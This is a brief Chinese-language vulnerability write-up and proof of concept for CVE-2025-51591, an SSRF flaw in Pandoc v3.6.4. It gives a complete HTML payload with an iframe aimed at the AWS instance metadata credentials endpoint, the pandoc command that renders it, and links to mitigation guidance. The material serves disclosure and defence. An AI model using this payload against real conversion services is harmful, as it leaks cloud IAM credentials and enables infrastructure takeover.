CVE-2025-51591 Pandoc SSRF漏洞利用详解 本文详细分析了CVE-2025-51591漏洞,该漏洞存在于Pandoc v3.6.4中,攻击者可通过构造恶意iframe实现服务器端请求伪造,进而获取AWS IMDS凭证并威胁整个基础设施安全。文章包含完整的漏洞复现步骤和缓解方案。 CVE-2025-51591 Pandoc SSRF POC Pandoc v3.6.4中存在服务器端请求伪造漏洞,攻击者可通过注入特制iframe获取并破坏整个基础设施。 安装Pandoc https://pandoc.org/installing.html 攻击载荷 1 2 3 4 5 6 7 8 9 <!DOCTYPE html> <html> <head> <title>CVE-2025-51591 Proof Of Concept</title> </head> <body> <iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/"></iframe> </body> </html> 使用Pandoc将载荷转换为PDF 1 pandoc payload.html -o output1.pdf 缓解策略 https://pandoc.org/MANUAL.html#a-note-on-security 参考链接 Hackers Exploit Pandoc CVE-2025-51591 to Target AWS IMDS and Steal EC2 IAM Credentials IMDS Abused: Hunting Rare Behaviors to Uncover Exploits